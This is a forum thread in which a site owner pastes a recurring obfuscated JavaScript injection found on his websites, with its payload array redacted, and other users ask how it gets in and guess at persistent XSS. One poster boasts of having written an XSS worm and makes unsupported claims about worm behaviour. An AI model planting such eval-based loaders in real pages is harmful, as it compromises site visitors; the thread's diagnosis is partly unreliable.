malware attack

[sharema1]

Below Malware script attacked my sites . i removed it more that 15 times but it is coming again and again . Changing the ftp passwords in 2 hour once but no use .  help me to remove this script and stop its routine attack .

"<script>if(window.document)aa=/s/g.exec("s").index+[];aaa='0';if(aa.indexOf(aaa)===0){ss='';s=String;ee='e';e=window.eval;t='y';}h=2*Math.cos(Math.PI);n=[ *** malware code removed *** ];f='f'+'romChar';for(i=0;i-n.length<0;i++){j=i;ss=ss+String[f+'Code'](-h*(1+n[j]));}q=ss;e(q);</script> "

[ErnieAlex]

First, you should never post a virus on any site...  or virus script, etc... 

Next, how is this bad script getting into your site?  Do you have an open site with no security on it?
What is the site like, what do you have for inputs on it that can be entered?  We can not help without
knowing what your code is like.  If you allow uploading files are they scanned before used?  If you enter
text or blog type data into a database are you running it thru a validation routine to check it out before
saving it?  Way too many questions to ask without knowledge of your invisible site...

PS:  PLEASE edit your message and delete that script...

[PHP_Person]

Hm... maybe it is a persistent XSS attack?

[ErnieAlex]

He hasn't written back with more info for us, so either he was trying to send US the virus or he solved it and just doesn't want to let us know he did...

[taslayer]

its a xss worm that crawls google and pulls vuoln sites and injects its code into the sites. i once coded one of my own for shits n giggles, was effective on facebook. can still do it on facebook with simple javascript facebook and twitter are full of xss vulns ok ill be quiet now, dude if you want help removin this
1st reformat ur comp. one version of the xss worm stores on your comp grabs passwords and injects all files in ftp 2. wenn u can just pm me if im around ill help you